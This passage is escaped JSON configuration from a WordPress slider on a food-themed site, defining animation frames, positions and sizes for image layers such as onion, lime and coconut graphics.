From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":840,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Onion\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic4.png\",\"imageId\":1076},\"size\":{\"width\":{\"d\":{\"v\":\"467px\",\"e\":true},\"n\":{\"v\":\"387px\",\"e\":true},\"t\":{\"v\":\"351px\",\"e\":true},\"m\":{\"v\":\"236px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"337px\",\"e\":true},\"n\":{\"v\":\"279px\",\"e\":true},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"170px\",\"e\":true}},\"originalWidth\":467,\"originalHeight\":337,\"aspectRatio\":{\"d\":{\"v\":1.3857566765578634981892491850885562598705291748046875},\"n\":{\"v\":1.3857566765578634981892491850885562598705291748046875},\"t\":{\"v\":1.3857566765578634981892491850885562598705291748046875},\"m\":{\"v\":1.3857566765578634981892491850885562598705291748046875}}},\"position\":{\"x\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"-10px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-140px\",\"e\":true},\"n\":{\"v\":\"-90px\",\"e\":true},\"t\":{\"v\":\"-20px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":260},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":\"45deg\",\"rotationY\":\"180deg\",\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":10,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Lime\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic5.png\",\"imageId\":1077},\"size\":{\"width\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"358px\",\"e\":true},\"t\":{\"v\":\"306px\",\"e\":true},\"m\":{\"v\":\"184px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"509px\",\"e\":true},\"n\":{\"v\":\"367px\",\"e\":true},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"188px\",\"e\":true}},\"originalWidth\":497,\"originalHeight\":509,\"aspectRatio\":{\"d\":{\"v\":0.97642436149312372695163730895728804171085357666015625},\"n\":{\"v\":0.97642436149312372695163730895728804171085357666015625},\"t\":{\"v\":0.97642436149312372695163730895728804171085357666015625},\"m\":{\"v\":0.97642436149312372695163730895728804171085357666015625}}},\"position\":{\"x\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-160px\",\"e\":true},\"n\":{\"v\":\"-130px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"9px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":330},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.8\",\"scaleY\":\"0.8\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power4.easeOut\",\"speed\":1500,\"start\":330,\"startRelative\":330},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power4.easeOut\",\"speed\":1500,\"start\":330,\"startRelative\":330},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":270,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Kokos\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic2.png\",\"imageId\":1078},\"size\":{\"width\":{\"d\":{\"v\":\"300px\",\"e\":true},\"n\":{\"v\":\"182px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"138px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"411px\",\"e\":true},\"n\":{\"v\":\"249px\",\"e\":true},\"t\":{\"v\":\"336px\",\"e\":true},\"m\":{\"v\":\"189px\",\"e\":true}},\"originalWidth\":316,\"originalHeight\":432,\"aspectRatio\":{\"d\":{\"v\":0.73148148148148151026504137917072512209415435791015625},\"n\":{\"v\":0.73148148148148151026504137917072512209415435791015625},\"t\":{\"v\":0.73148148148148151026504137917072512209415435791015625},\"m\":{\"v\":0.73148148148148151026504137917072512209415435791015625}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-100px\",\"e\":true},\"t\":{\"v\":\"2px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-70px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"-19px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2020,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-260,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Image 6\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic8.png\",\"imageId\":1082},\"size\":{\"width\":{\"d\":{\"v\":\"280px\",\"e\":true},\"n\":{\"v\":\"225px\",\"e\":true},\"t\":{\"v\":\"221px\",\"e\":true},\"m\":{\"v\":\"162px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"585px\",\"e\":true},\"n\":{\"v\":\"471px\",\"e\":true},\"t\":{\"v\":\"462px\",\"e\":true},\"m\":{\"v\":\"338px\",\"e\":true}},\"originalWidth\":280,\"originalHeight\":585,\"aspectRatio\":{\"d\":{\"v\":0.478632478632478652880166691829799674451351165771484375},\"n\":{\"v\":0.478632478632478652880166691829799674451351165771484375},\"t\":{\"v\":0.478632478632478652880166691829799674451351165771484375},\"m\":{\"v\":0.478632478632478652880166691829799674451351165771484375}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 